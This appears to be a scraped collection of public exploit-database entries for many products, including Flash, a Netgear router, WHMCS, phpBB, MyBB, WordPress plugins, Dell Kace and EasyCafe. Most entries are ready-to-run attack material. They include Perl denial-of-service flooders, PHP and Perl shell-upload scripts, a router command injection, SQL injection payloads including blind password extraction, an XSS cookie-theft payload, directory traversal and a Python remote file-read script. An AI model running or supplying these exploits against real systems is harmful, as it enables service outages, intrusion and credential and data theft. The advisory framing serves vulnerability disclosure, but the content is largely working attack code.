HireHackking

Source: https://code.google.com/p/google-security-research/issues/detail?id=576 There is a use-after-free in the TextField.text setter. If the text the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows: var mc = this.createEmptyMovieClip("mc", 101); var tf = mc.createTextField("tf", 102, 1, 1, 100, 100); tf.text = {toString : func}; function func(){ mc.removeMovieClip(); // Fix heap here return "natalie"; } A sample swf and fla are attached. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39053.zip

Source: https://code.google.com/p/google-security-research/issues/detail?id=571 There is a use-after-free in MovieClip.attachMovie. If a string parameter has toString defined, a number parameter has valueOf defined or an object parameter has its constructor redefined, it can execute code and free the this object of the method, leading to a use-after-free. A minimal PoC is as follows: n ={valueOf : func}; function func(){ _global.mc.removeMovieClip(); // fix heap here; } this.createEmptyMovieClip("mc", 1); _global.mc = mc; mc.attachMovie("myResetButton","newResetButton", n); A sample swf and fla are attached. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39055.zip

Source: https://code.google.com/p/google-security-research/issues/detail?id=574 There is a use-after-free in the TextField.tabIndex setter. If the integer parameter is an object with valueOf defined, then it can free the TextField's parent, leading to a use-after-free. A minimal PoC follows: var times = 0; var mc = this.createEmptyMovieClip("mc", 1); var tf = mc.createTextField("tf", 2, 1, 1, 100, 100); tf.text = "hello"; tf.tabIndex = {valueOf : func}; function func(){ if(times == 0){ times++; return; } mc.removeMovieClip(); // Fix heap here return 0x77777777; } A sample swf and fla are attached. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39054.zip

Source: https://code.google.com/p/google-security-research/issues/detail?id=570 There is a use-after-free issue in MovieClip.localToGlobal. If the Number constructor is overwritten with a new constructor and MovieClip.localToGlobal is called with an integer parameter, the new constructor will get called. If this constructor frees the MovieClip, a use-after-free occurs. A minimal PoC is as follows: var a = func; _global.Number = a; this.createEmptyMovieClip("mc", 1); mc.localToGlobal( 7 ); function func(){ mc.removeMovieClip(); // fix heap here this.x = 2; this.y = 1; } A sample swf and fla are attached. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39056.zip

source: https://www.securityfocus.com/bid/65444/info The Netgear D6300B router is prone to the following security vulnerabilities: 1. Multiple unauthorized-access vulnerabilities 2. A command-injection vulnerability 3. An information disclosure vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, execute arbitrary commands in the context of the affected device, and perform unauthorized actions. Other attacks are also possible. Netgear D6300B 1.0.0.14_1.0.14 is vulnerable; other versions may also be affected. ######## REQUEST: ######### ########################### POST /diag.cgi?id=991220771 HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.0.1/DIAG_diag.htm Authorization: Basic YWRtaW46cGFzc3dvcmQ= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 95 ping=Ping&IPAddr1=192&IPAddr2=168&IPAddr3=0&IPAddr4=1;ls&host_name=&ping_IPAddr=192.168.0.1 ######## RESPONSE: ######## ########################### HTTP/1.0 200 OK Content-length: 6672 Content-type: text/html; charset="UTF-8" Cache-Control:no-cache Pragma:no-cache <!DOCTYPE HTML> <html> [...] <textarea name="ping_result" class="num" cols="60" rows="12" wrap="off" readonly> bin cferam.001 data dev etc include lib linuxrc mnt opt &lt;/textarea&gt; [...]

/* source: https://www.securityfocus.com/bid/65470/info WHMCS is prone to a denial-of-service vulnerability. Successful exploits may allow attackers to cause denial-of-service condition, denying service to legitimate users. WHMCS 5.12 is vulnerable; other versions may also be affected. */ #!/usr/bin/perl ################################# # # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@ # ##################################### ##################################### # Iranian Exploit DataBase # WHMCS Denial of Service Vulnerability # Test on Whmcs 5.12 # Vendor site : www.whmcs.com # Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o () yahoo com # Site : Www.IeDb.Ir/acc - Www.IrIsT.Ir # Fb Page : https://www.facebook.com/iedb.ir # Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR - F () riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day # E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker # DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini # Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc ##################################### use Socket; if (@ARGV < 2) { &usage } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<10; $i--) { $data = "ajax=1&a=domainoptions&sld=saddddd&tld=saasssssssssss&checktype=owndomain"; $len = length $data; $foo = "POST ".$dir."cart.php HTTP/1.1\r\n". "Accept: * /*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+" ; } print "\n\n"; system('ping $host'); sub usage { print "################################################# \n"; print "## WHMCS Denial of Service Vulnerability\n"; print "## Discoverd By Amir - iedb.team () gmail com - Id : o0_shabgard_0o \n"; print "## Www.IeDb.Ir/acc - Www.IrIsT.Ir \n"; print "################################################# \n"; print "## [host] [path] \n"; print "## http://host.com /whmcs/\n"; print "################################################# \n"; exit(); }; ##################################### # Archive Exploit = http://www.iedb.ir/exploits-1300.html #####################################

source: https://www.securityfocus.com/bid/65460/info The Kiddo theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to sufficiently sanitize file extensions. An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible. <?php */ [+] Author: TUNISIAN CYBER [+] Exploit Title: Kidoo WP Theme File Upload Vulnerability [+] Date: 05-02-2014 [+] Category: WebApp [+] Google Dork: :( [+] Tested on: KaliLinux [+] Vendor: n/a [+] Friendly Sites: na3il.com,th3-creative.com Kiddo WP theme suffers from a File Upload Vulnerability +PoC: site/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php +Shell Path: site/3vil.php ScreenShot: http://i.imgur.com/c62cWHH.png Greets to: XMaX-tn, N43il HacK3r, XtechSEt Sec4Ever Members: DamaneDz UzunDz GEOIX E4A Members: Gastro-DZ */ echo "=============================================== \n"; echo " Kiddo WP Theme File Upload Vulnerability\n"; echo " TUNISIAN CYBER \n"; echo "=============================================== \n\n"; $uploadfile="cyber.php"; $ch = curl_init("site-content/themes/kiddo/app/assets/js/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

================================================================================ # Beezfud Remote Code Execution ================================================================================ # Vendor Homepage: https://github.com/EVA-01/beezfud # Date: 23/12/2015 # Software Link: https://github.com/EVA-01/beezfud/archive/master.zip # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/beezfud-exec.txt ================================================================================ # Vulnerable File : index.php # PoC : http://localhost/beezfud/index.php?parameter=;Command; Vulnerable Parameters : lookback , max , range , latest , earliest Example : http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo(); ?>' >info.php; ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================

source: https://www.securityfocus.com/bid/65481/info phpBB is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. ########################### # Phpbb Forum Denial of Service Vulnerability ########################### #!/usr/bin/perl # Iranian Exploit DataBase # Phpbb Forum Denial of Service Vulnerability # Version: All Version # Vendor site : http://www.phpbb.com # Code Written By Amir - iedb.team@gmail.com - o0_iedb_0o@yahoo.com # Site : Www.IeDb.Ir - Www.IrIsT.Ir # Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538 # Greats : TaK.FaNaR - ErfanMs - Medrik - F@riD - Bl4ck M4n - 0x0ptim0us - 0Day - Dj.TiniVini - E2MA3N # l4tr0d3ctism - H-SK33PY - Noter - r3d_s0urc3 - Dr_Evil And All Members In IeDb.Ir/acc ##################################### use Socket; if (@ARGV < 2) { &usage } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<10; $i--) { $data = "securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0"; $len = length $data; $foo = "POST ".$dir."search.php?do=process HTTP/1.1\r\n". "Accept: * /*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+" ; } print "\n\n"; system('ping $host'); sub usage { print "\n"; print "################################################# \n"; print "## Phpbb Forum Denial of Service Vulnerability\n"; print "## Discoverd By Amir - iedb.team@gmail.com - Id : o0_iedb_0o \n"; print "## Www.IeDb.Ir - Www.IrIsT.Ir \n"; print "################################################# \n"; print "## [host] [path] \n"; print "## http://host.com /forum/\n"; print "################################################# \n"; print "\n"; exit(); }; ##################################### # Archive Exploit = http://www.iedb.ir/exploits-868.html ##################################### ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2013-11-17] ###########################

================================================================================ # Rips Scanner 0.5 - (code.php) Local File Inclusion ================================================================================ # Vendor Homepage: https://github.com/robocoder/rips-scanner # Date: 24/12/2015 # Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip # Version : 0.5 # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/rips-code-lfi.txt ================================================================================ # Vulnerable File : code.php # Vulnerable Code: 102 $file = $_GET['file']; 103 $marklines = explode(',', $_GET['lines']); 104 $ext = '.'.pathinfo($file, PATHINFO_EXTENSION); 105 106 107 if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES)) 108 { 109 $lines = file($file); 110 111 // place line numbers in extra table for more elegant copy/paste without line numbers 112 echo '<tr><td><table>'; 113 for($i=1, $max=count($lines); $i<=$max;$i++) 114 echo "<tr><td class=\"linenrcolumn\"><span class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>'; 115 echo '</table></td><td id="codeonly"><table id="codetable" width="100%">'; 116 117 $in_comment = false; 118 for($i=0; $i<$max; $i++) 119 { 120 $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment); 121 } 122 } else 123 { 124 echo '<tr><td>Invalid file specified.</td></tr>'; 125 } # PoC : http://localhost/rips/windows/code.php?file=/var/www/html/index.php Vulnerable Parameter : file ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================

source: https://www.securityfocus.com/bid/65545/info MyBB is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. MyBB 1.6.12 is vulnerable; other versions may be also be affected. # Mybb All Version Denial of Service Vulnerability #!/usr/bin/perl # Iranian Exploit DataBase # Mybb All Version Denial of Service Vulnerability # Test on Mybb 1.6.12 # Vendor site : www.mybb.com # Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o () yahoo com # Site : Www.IeDb.Ir/acc - Www.IrIsT.Ir # Fb Page : https://www.facebook.com/iedb.ir # Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR - F () riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day # E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker # DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini # Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc ##################################### use Socket; if (@ARGV < 2) { &usage } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<10; $i--) { $data = "forums%5B%5D=all&version=rss2.0&limit=1500000&make=%D8%AF%D8%B1%DB%8C%D8%A7%D9%81%D8%AA+%D9%84%DB%8C%D9%86%DA%A9+%D9%BE%DB%8C%D9%88%D9%86%D8%AF+%D8%B3%D8%A7%DB%8C%D8%AA%DB%8C"; $len = length $data; $foo = "POST ".$dir."misc.php?action=syndication HTTP/1.1\r\n". "Accept: * /*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+" ; } print "\n\n"; system('ping $host'); sub usage { print "################################################# \n"; print "## Mybb All Version Denial of Service Vulnerability\n"; print "## Discoverd By Amir - iedb.team () gmail com - Id : o0_shabgard_0o \n"; print "## Www.IeDb.Ir/acc - Www.IrIsT.Ir \n"; print "################################################# \n"; print "## [host] [path] \n"; print "## http://host.com /mybb/\n"; print "################################################# \n"; exit(); }; ##################################### # Archive Exploit = http://www.iedb.ir/exploits-1332.html ##################################### ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2014-02-12] ###########################

source: https://www.securityfocus.com/bid/65587/info Red Hat Piranha is prone to a remote security bypass vulnerability. An attacker can exploit this issue to gain unauthorized access to the restricted pages of the application, this may lead to further attacks. Red Hat Piranha 0.8.6 is vulnerable; other versions may also be affected. curl -d'' -I http://www.example.com:3636/secure/control.php wget -qO- --post-data='' http://www.example.com3636/secure/control.php

source: https://www.securityfocus.com/bid/65557/info i-doit Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. i-doit Pro 1.2.4 and prior are vulnerable. http://www.example.com/?objID=[SQL Injection]

source: https://www.securityfocus.com/bid/65606/info Wire Immogest component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_wire_immogest&view=object&id=[SQL Injection]

source: https://www.securityfocus.com/bid/65628/info Rhino is prone to a cross-site scripting vulnerability and security-bypass vulnerability . An attacker can exploit these issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, bypass security restrictions to obtain sensitive information, or perform unauthorized actions. Other attacks may also be possible. Rhino 4.1 is vulnerable; other versions may also be affected. ========================== PoC-Exploit ========================== // Non-Persistent XSS with "callback" Parameter in /include/proactive_cross.php (1) Under "callback" set your GET Parameter Callback to "><script>alert(document.cookie)</script> The Non-Persistent XSS will be executed for the Administrator in the browser (he directly logged in because you chatting with him) // Remote Change Password - with "Forgot.php" http://[target]/rhino/operator/index.php?p=forgot (1) in the forgot file there's no condition if the user logged in or not, so we can look deeply in the file in line (27-67) if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['newP'])) { $defaults = $_POST; $femail = filter_var($_POST['f_email'], FILTER_SANITIZE_EMAIL); $pass = $_POST['f_pass']; $newpass = $_POST['f_newpass']; if ($pass != $newpass) { $errors['e1'] = $tl['error']['e10']; } elseif (strlen($pass) <= '5') { $errors['e1'] = $tl['error']['e11']; } if ($defaults['f_email'] == '' || !filter_var($defaults['f_email'], FILTER_VALIDATE_EMAIL)) { $errors['e'] = $tl['error']['e3']; } $fwhen = 0; $user_check = $lsuserlogin->lsForgotpassword($femail, $fwhen); if ($user_check == true && count($errors) == 0) { // The new password encrypt with hash_hmac $passcrypt = hash_hmac('sha256', $pass, DB_PASS_HASH); $result2 = $lsdb->query('UPDATE '.DB_PREFIX.'user SET password = "'.$passcrypt.'", forgot = 0 WHERE email = "'.smartsql($femail).'"'); $result = $lsdb->query('SELECT username FROM '.DB_PREFIX.'user WHERE email = "'.smartsql($femail).'" LIMIT 1'); $row = $result->fetch_assoc(); if (!$result) { ls_redirect(JAK_PARSE_ERROR); } else { $lsuserlogin->lsLogin($row['username'], $pass, 0); ls_redirect(BASE_URL); } } else { $errorsf = $errors; } } So there is an MySQL Query to execute if the email in the database (Show up the change password settings). ALL YOU HAVE TO DO IS DISCOVER THE E-MAIL ADDRESS THAT PUTTED WHEN ADMIN INSTALLED THE SCRIPT.

source: https://www.securityfocus.com/bid/65637/info The NextGEN Gallery plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. NextGEN Gallery 2.0.0 is vulnerable; other versions may also be affected. curl -i -d 'dir=/etc/' http://www.example.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php

source: https://www.securityfocus.com/bid/65646/info MODx Evogallery module is prone to an arbitrary file upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. <?php $uploadfile="file.php"; $ch = curl_init("demo.ltd/assets/modules/evogallery/js/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

#!/usr/bin/python -w # Title : EasyCafe Server <= 2.2.14 Remote File Read # Date : 25/12/2015 # Author : R-73eN # Tested on : Windows 7 Ultimate # Software Link : http://www.tinasoft.com/easycafe/ # Download Link: http://www.tinasoft.com/Download/easysetup.exe # Vulnerable Versions : EasyCafe Server <= 2.2.14 # EasyCafe Server has a feature to upload file from the server to a client. # And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload, # Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it. # The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request, # and does not check if it has sent the UDP request which gives us full Read access to the system. # #EDB Note: Code my need some adjusting import socket #Banner banner = "" banner += " ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner IP = "192.168.43.36" # Target IP PORT = 831 file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((IP, PORT)) file_to_read = "\x43" + file_to_read hex_value = ''.join(x.encode('hex') for x in file_to_read) fill = "\x00" end = "\x01\x00\x00\x00\x01" payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end s.send(payload) s.settimeout(0) print "[+] Request Send Waiting for Response . . . [+]" try: data = s.recv(261) # Get header while data: data = s.recv(2048) print data except Exception: print "[+] https://www.infogen.al/ [+]" finally: s.close()

source: https://www.securityfocus.com/bid/65029/info Dell Kace 1000 Systems Management Appliance is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Dell Kace 1000 Systems Management Appliance 5.4.76847 is vulnerable; other versions may also be affected. Proof of Concept Page: /service/kbot_service.php Web method: getUploadPath Parameter: macAddress PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error. POST /service/kbot_service.php HTTP/1.1 Accept-Encoding: gzip,deflate Host: www.example.com SOAPAction: "urn:#getUploadPath" Content-Length: 543 <soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl"> <soapenv:Header/> <soapenv:Body> <urn:getUploadPath soapenv:encodingStyle= "http://example.xmlsoap.org/soap/encoding/"> <macAddress xsi:type="xsd:string">' or '1'='1</macAddress> <filename xsi:type="xsd:string">test</filename> </urn:getUploadPath> </soapenv:Body> </soapenv:Envelope> Page: /service/kbot_service.php Web method: getKBot Parameter: macAddress PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error. POST /service/kbot_service.php HTTP/1.1 Accept-Encoding: gzip,deflate Host: www.example.com Content-Type: text/xml;charset=UTF-8 SOAPAction: "urn:#getKBot" Content-Length: 553 <soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl"> <soapenv:Header/> <soapenv:Body> <urn:getKBotConfig soapenv:encodingStyle="http://example.xmlsoap.org/soap/encoding/"> <macAddress xsi:type="xsd:string">' or (select ascii(substring(PASSWORD,1,1)) from USER limit 2,1) = 101 and ''='</macAddress> </urn:getKBotConfig> </soapenv:Body> </soapenv:Envelope> The following pages also appear to be affected by similar SQL injection weaknesses, however require authentication: Page: /userui/advisory_detail.php PoC: http://www.example.com/userui/advisory_detail.php?ID=9-2 Notes: Requires Authentication Page: /userui/ticket_list.php?SEARCH_SELECTION=any&ORDER[]=ID Parameter: ORDER[] Notes: Requires Authentication Page: /userui/ticket.php?ID=86 Parameter: ID Notes: Requires Authentication

[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt Vendor: ============== M. Jean Fages www.accessdiver.com circa 1998-2006 Product: ============================= AccessDiver V4.301 build 5888 AccessDiver is a security tester for Web pages. It has got a set of tools which will verify the robustness of you accounts and directories. You will know if your customers, your users and you can use safely your web site. Vulnerability Type: =================== Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ===================== AccessDiver is vulnerable to multiple buffer overflows, two vectors are described below. 1) buffer overflow @ 2073 bytes in URL field for Server / IP address and will overwrite NSEH and SEH exception handlers. EAX 00000000 ECX 52525252 EDX 7C9037D8 ntdll.7C9037D8 EBX 00000000 ESP 0012EA08 EBP 0012EA28 ESI 00000000 EDI 00000000 EIP 52525252 <----------------- BOOM C 0 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 1 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDF000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty 3 2 1 0 E S P U O Z D I FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ) FCW 1272 Prec NEAR,53 Mask 1 1 0 0 1 0 2) Buffer overflow when loading a malicious "Exploit zone file" text file containing 2080 bytes, load text file from "Weak History" Menu choose Import "from File" choose exploit text file and BOOM! EAX 00000000 ECX 52525242 EDX 7702B4AD ntdll.7702B4AD EBX 00000000 ESP 0018E940 EBP 0018E960 ESI 00000000 EDI 00000000 EIP 52525242 <----------------- KABOOM C 0 ES 002B 32bit 0(FFFFFFFF) P 1 CS 0023 32bit 0(FFFFFFFF) A 0 SS 002B 32bit 0(FFFFFFFF) Z 1 DS 002B 32bit 0(FFFFFFFF) S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0(FFFFFFFF) D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty g ST1 empty g ST2 empty g ST3 empty g ST4 empty g ST5 empty g ST6 empty g ST7 empty g 3 2 1 0 E S P U O Z D I FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ) FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0 Windbg dump... (2abc.2330): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=52525252 edx=7702b4ad esi=00000000 edi=00000000 eip=52525252 esp=0018e7f4 ebp=0018e814 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 52525252 ?? ??? Disclosure Timeline: ===================================== Vendor Notification: NA December 26, 2015 : Public Disclosure Exploitation Technique: ======================= Local Severity Level: ================ Med =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

source: https://www.securityfocus.com/bid/65059/info Imageview is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. Imageview 6.x are vulnerable; other versions may also be affected. http://www.example.com/photos/upload.php http://www.example.com/Galerie/upload.php

source: https://www.securityfocus.com/bid/65060/info The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. #! /usr/bin/perl use LWP; use HTTP::Request::Common; my ($url, $file) = @ARGV; my $ua = LWP::UserAgent->new(); my $req = POST $url, Content_Type => 'form-data', Content => [ name => $name, galleryselect => 1, # Gallery ID (popup.php) Filedata => [ "$file", "file.php.gif", Content_Type => 'image/gif' ] ]; my $res = $ua->request( $req ); if( $res->is_success ) { print $res->content; } else { print $res->status_line, "\n"; } -------------------- Example URI: -------------------- http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php

source: https://www.securityfocus.com/bid/65121/info XOS Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. XOS Shop 1.0 rc7o is vulnerable; other versions may also be affected. http://www.example.com/Xoshop/shop/redirect.php?action=url&goto=[SQLI]

source: https://www.securityfocus.com/bid/65126/info ZenPhoto is prone to an SQL-injection vulnerability and multiple path-disclosure vulnerabilities. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The attacker may gain access to potentially sensitive information that can aid in other attacks. ZenPhoto 1.4.4 is vulnerable; other versions may also be affected. http://www.example.com/zenphoto/index.php?p=search&date=[SQL Injection]

